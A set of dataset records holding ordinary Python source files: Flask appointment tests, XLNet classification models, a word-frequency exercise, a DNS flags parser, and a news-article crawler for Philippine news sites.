self.assertEqual(resp.json['date'], str(self.today))\n\n def test_all_appointments_with_date(self):\n date = '1988-08-08'\n resp = self.client.get('/appointment/?date=%s' % date)\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], 0.0)\n self.assertEqual(resp.json['date'], date)\n\n def test_all_appointments_with_timezone(self):\n resp = self.client.get('/appointment/?timezone=%s' % self.timezone)\n self.assertEqual(resp.mimetype, 'application/json')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json['timezone'], self.timezone)\n self.assertEqual(resp.json['date'], str(self.today))\n self.assertEqual(len(resp.json['apt_time_utc_seconds']),\n len(self.appointment_times))\n\n def test_appointment_ok(self):\n start_time1 = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n # date = \"2000-01-26\"\n hour = 3600\n timezone = 8.0\n apt1 = self.make_an_appointment(start_time1, start_time1 + 4*hour,\n timezone)\n db.session.add(apt1)\n db.session.commit()\n\n ok, message = appointment_ok(apt1)\n self.assertFalse(ok)\n\n apt2 = self.make_an_appointment(start_time1+hour, start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt2)\n self.assertFalse(ok)\n\n apt3 = self.make_an_appointment(start_time1, start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt3)\n self.assertFalse(ok)\n\n apt4 = self.make_an_appointment(start_time1+2*hour,\n start_time1 + 4*hour,\n timezone)\n ok, message = appointment_ok(apt4)\n self.assertFalse(ok)\n\n apt5 = self.make_an_appointment(start_time1+2*hour,\n start_time1 + 2*hour,\n timezone)\n ok, message = appointment_ok(apt5)\n self.assertFalse(ok)\n\n apt6 = self.make_an_appointment(start_time1+4*hour,\n start_time1 + 8*hour,\n timezone)\n ok, message = appointment_ok(apt6)\n self.assertTrue(ok)\n\n def test_all_appointments_day_before_after(self):\n zero_time = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n hour = 3600\n timezone = 8.0\n date = \"2000-01-26\"\n apt_before = self.make_an_appointment(zero_time - hour, zero_time,\n timezone)\n apt_after = self.make_an_appointment(zero_time, zero_time + hour,\n timezone)\n db.session.add(apt_before)\n db.session.add(apt_after)\n db.session.commit()\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time - hour, zero_time],\n [zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 0], [0, 60]])\n timezone = 9.0\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time - hour, zero_time],\n [zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 60], [60, 120]])\n timezone = 7.0\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[zero_time, zero_time + hour]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 0]])\n\n def test_all_appointments_a_whole_day(self):\n # 
Test cases where appointments last for a whole day long\n start_time = 948816000 # 1/26/2000 12:00:00 AM GMT+8\n end_time = 948902400 # 1/27/2000 12:00:00 AM GMT+8\n timezone = 8.0\n day_seconds = 24 * 3600\n date = \"2000-01-26\"\n apt1 = self.make_an_appointment(start_time, end_time, timezone)\n db.session.add(apt1)\n db.session.commit()\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440]])\n\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone + 1)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone + 1)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0 + 60, 1440]])\n\n url = '/appointment/?date=%s&timezone=%s' % (date, timezone - 3)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time, end_time]])\n self.assertEqual(resp.json['timezone'], timezone - 3)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440 - 60*3]])\n\n # Create another appointment just after apt1\n apt2 = self.make_an_appointment(start_time + day_seconds,\n end_time + day_seconds,\n timezone)\n db.session.add(apt2)\n db.session.commit()\n for tz_delta in range(-12, 0):\n tz = timezone + tz_delta\n url = '/appointment/?date=%s&timezone=%s' % (date, tz)\n resp = self.client.get(url)\n self.assert200(resp)\n self.assertEqual(resp.json['date'], date)\n self.assertEqual(resp.json['apt_time_utc_seconds'],\n [[start_time,\n start_time + day_seconds],\n [start_time + day_seconds,\n end_time + day_seconds]])\n self.assertEqual(resp.json['timezone'], tz)\n self.assertEqual(resp.json['apt_time_slider_minutes'],\n [[0, 1440 + tz_delta*60],\n [1440 + tz_delta*60, 1440]])\n\n def test_post_create(self):\n data = self.make_an_appointment_dict(\"2011-02-03\", \"60\", \"120\")\n with self.client:\n resp = self.client.post('/appointment/create', data=data,\n follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n self.assertTrue(\"Thank\" in resp.data)\n\n # Ensure session contains something.\n self.assertEqual(session['name'], data['name'])\n self.assertEqual(session['email'], data['email'])\n\n def test_post_illegal_data(self):\n illegal_date = \"2011-02-033\"\n data = self.make_an_appointment_dict(illegal_date, \"60\", \"120\")\n resp = self.client.post('/appointment/create', data=data,\n follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_get_local_minutes(self):\n seconds1 = 1390665600 # 1/26/2014 12:00:00 AM GMT+8\n seconds2 = 1390752000 # 1/27/2014 12:00:00 AM GMT+8\n date_obj = date(2014, 1, 26)\n timezone = 8 # GMT+8\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 0)\n self.assertEqual(m2, 1440)\n\n timezone = 7 # GMT+7\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 0)\n self.assertEqual(m2, 1380)\n\n timezone = 9 # GMT+9\n m1 = get_local_minutes(seconds1, date_obj, timezone)\n m2 = 
get_local_minutes(seconds2, date_obj, timezone)\n self.assertEqual(m1, 60)\n self.assertEqual(m2, 1440)\n","sub_path":"tests/test_appointment.py","file_name":"test_appointment.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597372899","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom src.module.utils.squash import squash\nfrom src.module.attention.bilinear_attention import BilinearAttention\nimport numpy as np\n\n\nclass XlnetEncodingNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, hidden_size, dropout):\n super(XlnetEncodingNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, hidden_size),\n nn.Dropout(dropout)\n )\n\n def forward(self, xlnet_token, xlnet_segment):\n # xlnet encoding\n encoder_layer = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)[0]\n batch_size, segment_len = xlnet_segment.size()\n max_segment_len = xlnet_segment.argmax(dim=-1, keepdim=True)\n batch_arrange = torch.arange(segment_len).unsqueeze(0).expand(batch_size, segment_len).to(xlnet_segment.device)\n segment_mask = batch_arrange <= max_segment_len\n sentence_mask = segment_mask & (1 - xlnet_segment).byte()\n sentence_lens = sentence_mask.long().sum(dim=1, keepdim=True)\n\n # sentence encode layer\n max_len = sentence_lens.max().item()\n sentence = encoder_layer[:, 0: max_len].contiguous()\n sentence_mask = sentence_mask[:, 0: max_len].contiguous()\n sentence = sentence.masked_fill(sentence_mask.unsqueeze(-1) == 0, 0)\n sentence = self.sentence_transform(sentence)\n\n return sentence\n\n\nclass XlnetCapsuleNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, capsule_size, dropout, num_categories):\n super(XlnetCapsuleNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.capsule_size = capsule_size\n self.aspect_transform = nn.Sequential(\n nn.Linear(xlnet_size, capsule_size),\n nn.Dropout(dropout)\n )\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, capsule_size),\n nn.Dropout(dropout)\n )\n self.norm_attention = BilinearAttention(capsule_size, capsule_size)\n self.guide_capsule = nn.Parameter(\n torch.Tensor(num_categories, capsule_size)\n )\n self.guide_weight = nn.Parameter(\n torch.Tensor(capsule_size, capsule_size)\n )\n self.scale = nn.Parameter(torch.tensor(5.0))\n self.capsule_projection = nn.Linear(xlnet_size, xlnet_size * num_categories)\n self.dropout = dropout\n self.num_categories = num_categories\n self._reset_parameters()\n\n def _reset_parameters(self):\n nn.init.xavier_uniform_(self.guide_capsule)\n nn.init.xavier_uniform_(self.guide_weight)\n\n def load_sentiment(self, path):\n sentiment = np.load(path)\n e1 = np.mean(sentiment)\n d1 = np.std(sentiment)\n e2 = 0\n d2 = np.sqrt(2.0 / (sentiment.shape[0] + sentiment.shape[1]))\n sentiment = (sentiment - e1) / d1 * d2 + e2\n self.guide_capsule.data.copy_(torch.tensor(sentiment))\n\n def forward(self, xlnet_token, xlnet_segment):\n # xlnet encoding\n encoder_layer = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)[0] # [b,l,dim]\n batch_size, segment_len = xlnet_segment.size()\n max_segment_len = xlnet_segment.argmax(dim=-1, keepdim=True)\n batch_arrange = torch.arange(segment_len).unsqueeze(0).expand(batch_size, segment_len).to(xlnet_segment.device)\n segment_mask = batch_arrange <= max_segment_len\n sentence_mask = 
segment_mask & (1 - xlnet_segment).byte()\n aspect_mask = xlnet_segment\n sentence_lens = sentence_mask.long().sum(dim=1, keepdim=True)\n # aspect average pooling\n aspect_lens = aspect_mask.long().sum(dim=1, keepdim=True)\n aspect = encoder_layer.masked_fill(aspect_mask.unsqueeze(-1) == 0, 0)\n aspect = aspect.sum(dim=1, keepdim=False) / aspect_lens.float()\n # sentence encode layer\n max_len = sentence_lens.max().item()\n sentence = encoder_layer[:, 0: max_len].contiguous()\n sentence_mask = sentence_mask[:, 0: max_len].contiguous()\n sentence = sentence.masked_fill(sentence_mask.unsqueeze(-1) == 0, 0)\n # primary capsule layer\n sentence = self.sentence_transform(sentence)\n primary_capsule = squash(sentence, dim=-1)\n aspect = self.aspect_transform(aspect)\n aspect_capsule = squash(aspect, dim=-1)\n # aspect aware normalization\n norm_weight = self.norm_attention.get_attention_weights(aspect_capsule, primary_capsule, sentence_mask)\n # capsule guided routing\n category_capsule = self._capsule_guided_routing(primary_capsule, norm_weight)\n category_capsule_norm = torch.sqrt(torch.sum(category_capsule * category_capsule, dim=-1, keepdim=False))\n return category_capsule_norm\n\n def _capsule_guided_routing(self, primary_capsule, norm_weight):\n guide_capsule = squash(self.guide_capsule)\n guide_matrix = primary_capsule.matmul(self.guide_weight).matmul(guide_capsule.transpose(0, 1))\n guide_matrix = F.softmax(guide_matrix, dim=-1)\n guide_matrix = guide_matrix * norm_weight.unsqueeze(-1) * self.scale # (batch_size, time_step, num_categories)\n category_capsule = guide_matrix.transpose(1, 2).matmul(primary_capsule)\n category_capsule = F.dropout(category_capsule, p=self.dropout, training=self.training)\n category_capsule = squash(category_capsule)\n return category_capsule\n\n\nclass XlnetCNNNetwork(nn.Module):\n def __init__(self, xlnet, xlnet_size, dropout, cnn_size, filter_size, filter_nums, num_categories):\n super(XlnetCNNNetwork, self).__init__()\n self.xlnet = XlnetEncodingNetwork(xlnet, xlnet_size, cnn_size, dropout)\n self.dropout = dropout\n self.num_categories = num_categories\n self.cnn_size = cnn_size\n self.filter_size = filter_size\n self.filter_nums = filter_nums\n self.cnnDrop = nn.Dropout(0.5)\n self.convs = nn.ModuleList([\n nn.Sequential(\n nn.Conv1d(self.cnn_size, self.filter_nums, kernel_size=k),\n # nn.BatchNorm1d(num_features=feature_size),\n nn.ReLU(),\n ) for k in self.filter_size])\n self.linear = nn.Linear(self.filter_nums * len(self.filter_size), self.num_categories, bias=False)\n\n @staticmethod\n def pooling(conv, x):\n x = conv(x)\n x = F.max_pool1d(x, kernel_size=x.size(-1)).squeeze(-1)\n return x\n\n def forward(self, xlnet_token, xlnet_segment):\n xlnetout = self.xlnet(xlnet_token, xlnet_segment) # [b,l,dim]\n xlnetout = xlnetout.transpose(1, 2)\n out = [conv(xlnetout) for conv in self.convs]\n out = [F.max_pool1d(o, kernel_size=o.size(-1)).squeeze(-1) for o in out] # [B,D,L] -> [B,O,L]*len -> [B,O,1]*len -> [B,O]*len\n out = torch.cat(out, -1) # [B, len(k)*O]\n # out = self.cnnDrop(out)\n out = self.linear(out)\n # out = torch.softmax(out, -1)\n return out\n\n\nclass XlnetFcNetwork(nn.Module):\n\n def __init__(self, xlnet, xlnet_size, dropout, hidden_size, num_categories):\n super(XlnetFcNetwork, self).__init__()\n self.xlnet = xlnet\n self.xlnet_size = xlnet_size\n self.hidden_size = hidden_size\n self.num_categories = num_categories\n self.sentence_transform = nn.Sequential(\n nn.Linear(xlnet_size, hidden_size),\n nn.Dropout(dropout)\n )\n self.linear 
= nn.Linear(self.hidden_size, self.num_categories, bias=False)\n # 0.首先写出一个test xml版本 1.怎么变成last_hidden_size 2.token type ids 0/1/2 3.attention mask\n def forward(self, xlnet_token, xlnet_segment):\n output = self.xlnet(input_ids=xlnet_token, token_type_ids=xlnet_segment)\n out = self.sentence_transform(output[0][:, -1])\n out = self.linear(out)\n # out = torch.softmax(out, -1)\n return out\n","sub_path":"src/aspect_category_model/xlnet_all.py","file_name":"xlnet_all.py","file_ext":"py","file_size_in_byte":8049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"625634186","text":"from typing import List\nfrom collections import Counter\nclass Solution:\n def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n ban = set(banned)\n freq = Counter()\n word, n = \"\", len(paragraph)\n for i in range(n + 1):\n if i < n and paragraph[i].isalpha():\n word += paragraph[i].lower()\n elif word:\n if word not in ban:\n freq[word] += 1\n word = \"\"\n maxFreq = max(freq.values())\n return next(word for word, f in freq.items() if f == maxFreq)\n\nx = Solution()\nprint(x.mostCommonWord(\"a, a, a, a, b,b,b,c, c\",[\"a\"]))\n\n#因为有用标点符号分隔的有用空格分隔的所以这个方法不太行\n\nclass Solution1:\n def mostCommonWord(self, paragraph: str, banned: List[str]) -> str:\n for i in ['!','?',\"'\",',',\";\",\".\"]:\n paragraph = paragraph.replace(i,'')\n paragraph=paragraph.lower()\n dic = Counter(paragraph.split(' '))\n banlist = set(banned)\n max = 0\n maxkey=''\n for (key,value) in dic.items():\n if value>max and key not in banlist:\n maxkey=key\n max = value\n return maxkey","sub_path":"819. 最常见的单词/819. 最常见的单词.py","file_name":"819. 最常见的单词.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198629864","text":"import struct\n\n\nclass Flags():\n def __init__(self, data):\n self.data = bin(data)[2:].zfill(16)\n self.qr = 0\n self.opcode = 0\n self.authoritative_answer = 0\n self.truncated = 0\n self.recursion_desired = 0\n self.recursion_available = 0\n self.zero = 0\n self.rcode = 0\n\n def parse(self):\n self.qr = self.data[0]\n self.opcode = self.data[1:5]\n self.authoritative_answer = self.data[5]\n self.truncated = self.data[6]\n self.recursion_desired = self.data[7]\n self.recursion_available = self.data[8]\n self.zero = self.data[9:12]\n self.rcode = self.data[12:16]\n\n\nclass CollectFlags():\n def __init__(self, qr=0,opcode=0, aa=1, tc=0, rd=1, ra=1, rcode=0):\n self.result = ''\n self.result += str(qr) + 4 * str(opcode) + str(aa) + str(tc) + str(rd) + str(ra) + '000' + 4 * str(rcode)\n\n\n def get_bytes(self):\n return int(self.result, 2)\n\n","sub_path":"dnspackage/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93066836","text":"# start CoreNLP server\n# java -mx4g -cp \"*\" --add-modules java.xml.bind edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 20000 -annotators tokenize,ssplit,pos,lemma,ner,parse,sentiment -ssplit.eolonly\n# for deployment\n# pm2 start java --crawlerName=\"corenlp\" --cwd=\"/usr/bin/\" -x -- -mx4g -cp \"/home/vnc/corenlp/*\" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 20000 -annotators tokenize,ssplit,pos,lemma,ner,parse,sentiment -ssplit.eolonly -quiet\n# hack method to backup db on server\n# rethinkdb dump -c localhost:28015\n# tar zxvf 
./rethinkdb_dump_2017-01-24T21:42:08.tar.gz\n# rm rethinkdb_dump_2017-01-24T21:21:47.tar.gz\n# mv rethinkdb_dump_2017-01-24T21:42:08 rethinkdb_dump_2017-01-24\n# tar -czvf rethinkdb_dump_2017-01-24.tar.gz rethinkdb_dump_2017-01-24\nimport newspaper\nfrom newspaper.nlp import summarize, keywords\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS\nimport json\nimport time\nfrom datetime import datetime\nimport re\nimport langdetect\nfrom random import randrange\nfrom urllib.parse import urldefrag, urlparse\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom dotenv import load_dotenv, find_dotenv\nfrom db import get_locations, get_provinces, get_one, insert_article, insert_log, get_uuid, get_rand_sources, get_sources, insert_item\nfrom utils import PH_TIMEZONE, search_locations, search_authors, get_publish_date, sleep, get_popularity, get_proxy, clean_url, categorize\n# from aylien import categorize, get_rate_limits\nfrom nlp import get_entities, summarize2\nfrom nlp.keywords import parse_topics\nfrom fake_useragent import UserAgent\nimport rethinkdb as r\nimport re\nfrom random import shuffle\nimport os\n\nload_dotenv(find_dotenv(), override=True)\n\nlocations = get_locations()\nprovinces = get_provinces()\n\n# news_sources = get_news_sources('timestamp')\n# shuffle(news_sources)\n# if not news_sources:\n# if PY_ENV == 'development':\n# print('EMPTY NEWS SOURCES')\n\nPY_ENV = os.environ.get('PY_ENV')\ncount = 0\nslp_time = 0\nlast_proxy = ''\n\nwhile True:\n news_sources = get_rand_sources()\n\n for news_source in news_sources:\n src_start_time = time.clock()\n src_art_count = 0\n\n url = news_source['url']\n source_id = news_source['id']\n\n config = newspaper.Config()\n config.follow_meta_refresh = True\n # config.memoize_articles = True if PY_ENV == 'production' else False\n config.memoize_articles = False\n\n proxy = get_proxy(last_proxy)\n last_proxy = proxy['http']\n\n if PY_ENV == 'production':\n # config.browser_user_agent = UserAgent().random\n config.browser_user_agent = 'Tutubot/1.0'\n # config.proxies = proxy\n\n try:\n source = newspaper.build(url, config=config)\n except Exception as e:\n if PY_ENV == 'development':\n print('(SOURCE ERROR) Source Skipped\\n')\n insert_log(source_id, 'sourceCrawl', 'error',\n float(time.clock() - src_start_time), {\n 'errorMessage': 'SOURCE ERROR',\n 'crawlerName': 'credible crawler'\n })\n continue\n\n error_articles = []\n prev_uuid = ''\n for article in source.articles:\n url_uuid = get_uuid(clean_url(article.url))\n article.id = url_uuid\n\n if prev_uuid == url_uuid:\n continue\n\n if get_one(url_uuid, 'errorArticles') or get_one(\n url_uuid, 'articles'):\n print('Skipped: ' + article.url)\n error_articles.append(article.id)\n\n prev_uuid = url_uuid\n\n source.articles = [\n a for a in source.articles if a.id not in error_articles\n ]\n\n if PY_ENV == 'development':\n print('Proxy: ' + proxy['http'])\n print('User-Agent: ' + config.browser_user_agent)\n print('\\nCrawler found new ' + str(len(source.articles)) +\n ' articles in http://' + source.domain + '\\n')\n\n insert_log(\n source_id, 'sourceCrawl', 'pending',\n float(time.clock() - src_start_time), {\n 'proxy': proxy['http'],\n 'userAgent': config.browser_user_agent,\n 'articlesCount': len(source.articles),\n 'crawlerName': 'credible crawler'\n })\n\n if not source.articles:\n if PY_ENV == 'development':\n print('(ZERO ARTICLES) Source Skipped\\n')\n slp_time = insert_log(source_id, 'sourceCrawl', 'error',\n float(time.clock() - src_start_time), {\n 
'errorMessage': 'ZERO ARTICLES',\n 'crawlerName': 'credible crawler'\n })\n continue\n\n for article in source.articles:\n start_time = time.clock()\n sleep(slp_time)\n\n if PY_ENV == 'development':\n print(article.url)\n\n insert_log(source_id, 'articleCrawl', 'pending', float(slp_time), {\n 'articleUrl': article.url,\n 'crawlerName': 'credible crawler'\n })\n\n if re.search('/(category|gallery|photos?)/', article.url,\n re.IGNORECASE):\n if PY_ENV == 'development':\n print('\\n(NOT AN ARTICLE PAGE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'errorMessage': 'NOT AN ARTICLE PAGE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n try:\n article.download()\n article.parse()\n\n title = article.title\n title_split = article.title.split('|')\n\n if len(title_split) != 1:\n title = title_split[0].strip()\n\n pattern = re.compile(source.brand, re.IGNORECASE)\n body = pattern.sub('', article.text)\n categories = categorize(body)\n\n try:\n # if langdetect.detect(body) != 'en' or langdetect.detect(title) != 'en':\n if langdetect.detect(body) != 'en':\n if PY_ENV == 'development':\n print('\\n(NOT ENGLISH) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NOT ENGLISH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n except Exception:\n if PY_ENV == 'development':\n print('\\n(NOT ENGLISH) Skipped: ' + str(article.url) +\n '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NOT ENGLISH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if len(body.split()) < 100:\n if PY_ENV == 'development':\n print('\\n(SHORT CONTENT) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'SHORT CONTENT',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if source.brand in body:\n if PY_ENV == 'development':\n print('\\n(SOURCE IS IN BODY) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'SOURCE IS IN BODY',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if not body:\n if PY_ENV == 'development':\n print(\n '\\n(NO TEXT) Skipped: ' + str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'NO TEXT',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n combined_body = body + ' ' + article.text + ' ' + title + ' ' + urlparse(\n article.url).path\n matched_locations = search_locations(combined_body, locations,\n provinces)\n\n nation_terms = 
r'\\WPH|Philippines?|Pilipinas|Filipino|Pilipino|Pinoy|Filipinos\\W'\n nation_pattern = re.compile(\n r'(\\W(' + nation_terms + ')$|^(' + nation_terms +\n r')\\W|\\W(' + nation_terms + r')\\W)', re.IGNORECASE)\n\n with open('./world-countries.json') as countries_file:\n countries = json.load(countries_file)\n for country in countries:\n if country in combined_body and not nation_pattern.search(\n combined_body):\n if PY_ENV == 'development':\n print('\\n(HAS OTHER COUNTRY BUT NO PH) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'HAS OTHER COUNTRY BUT NO PH',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if not matched_locations:\n if not nation_pattern.search(combined_body):\n if PY_ENV == 'development':\n print('\\n(CAN\\'T FIND LOCATION) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'CAN\\'T FIND LOCATION',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n publish_date = get_publish_date(article.html)\n\n if publish_date.year < 2017 or publish_date.replace(\n tzinfo=None).date() > datetime.now().date():\n if PY_ENV == 'development':\n print('\\n(PUBLISH DATE NOT IN RANGE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'PUBLISH DATE NOT IN RANGE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n if (not publish_date):\n if PY_ENV == 'development':\n print('\\n(CAN\\'T FIND PUBLISH DATE) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'CAN\\'T FIND PUBLISH DATE',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n publish_date = r.expr(publish_date)\n organizations, people, error = get_entities(body)\n\n if error:\n if PY_ENV == 'development':\n print('\\n(TEXT IS TOO LONG) Skipped: ' +\n str(article.url) + '\\n')\n slp_time = insert_log(\n source_id, 'articleCrawl', 'error',\n float(time.clock() - start_time), {\n 'articleUrl': article.url,\n 'articleTitle': title,\n 'errorMessage': 'TEXT IS TOO LONG',\n 'crawlerName': 'credible crawler'\n })\n insert_item({'id': article.id}, 'errorArticles')\n continue\n\n # summary_sentences = summarize2(body)\n # summary_sentences = [\n # s for s in summary_sentences if len(s.split(' ')) > 5\n # ]\n\n sentiment = SentimentIntensityAnalyzer().polarity_scores(body)\n # topics = parse_topics(body)\n popularity = get_popularity(article.url)\n joined_authors = ''.join(article.authors)\n\n if len(joined_authors) > 75:\n article.authors = [search_authors(article.html)]\n elif not article.authors:\n author = search_authors(article.html)\n if author:\n article.authors.append(author)\n\n article.top_image = '' if re.search(\n 'favicon', article.top_image) else article.top_image\n\n with open('../detector/tl_stopwords.txt', 'r') as f:\n TL_STOPWORDS = f.read().splitlines()\n\n 
STOP_WORDS = ENGLISH_STOP_WORDS.union(TL_STOPWORDS)\n cleaned_body = ' '.join([\n word for word in body.split()\n if word.lower() not in STOP_WORDS\n ])\n cleaned_title = ' '.join([\n word for word in title.split()\n if word.lower() not in STOP_WORDS\n ])\n text_keyws = list(keywords(cleaned_body).keys())\n title_keyws = list(keywords(cleaned_title).keys())\n keyws = list(set(title_keyws + text_keyws))\n\n summary = summarize(\n title=article.title, text=body, max_sents=3)\n\n # keywords = []\n # for key, value in article.keywords.items():\n # keywords.append({\n # 'word': key,\n # 'score': value\n # })\n\n # keywords = sorted(\n # keywords, key=lambda k: k['score'], reverse=True)\n # keywords = [keyword['word'] for keyword in keywords]\n\n new_article = {\n 'id': article.id,\n 'url': article.url,\n 'sourceId': news_source['id'],\n 'title': title,\n 'authors': article.authors,\n 'body': body,\n 'publishDate': publish_date,\n 'topImageUrl': article.top_image,\n # 'summary': summary_sentences,\n 'summary': summary,\n 'keywords': keyws,\n 'locations': matched_locations,\n 'categories': categories,\n 'sentiment': sentiment,\n 'organizations': organizations,\n 'people': people,\n 'popularity': popularity,\n # 'articleHtml': article.article_html,\n 'reactions': [],\n 'relatedArticles': []\n }\n\n insert_article(new_article)\n count += 1\n src_art_count += 1\n runtime = float(time.clock() - start_time)\n\n # rate_limits = get_rate_limits()\n # aylien_status = rate_limits[0]\n # aylien_status2 = rate_limits[1]\n # aylien_status3 = rate_limits[2]\n\n if PY_ENV == 'development':\n print(\n str(count) + '.) ' + str(title) + ' | ' +\n str(article.url))\n print('Locations: ' + ' | '.join([\n ml['location']['formattedAddress']\n for ml in matched_locations\n ]))\n # print('AYLIEN REMAINING CALL: [' +\n # str(aylien_status['remaining']) + ', ' +\n # str(aylien_status2['remaining']) + ', ' + str(\n # aylien_status3['remaining']) + '] -- ' + str(\n # '%.2f' % runtime + 's scraping runtime'))\n\n slp_time = insert_log(source_id, 'articleCrawl', 'success',\n float(time.clock() - start_time), {\n 'articleId': article.id,\n 'crawlerName': 'credible crawler'\n 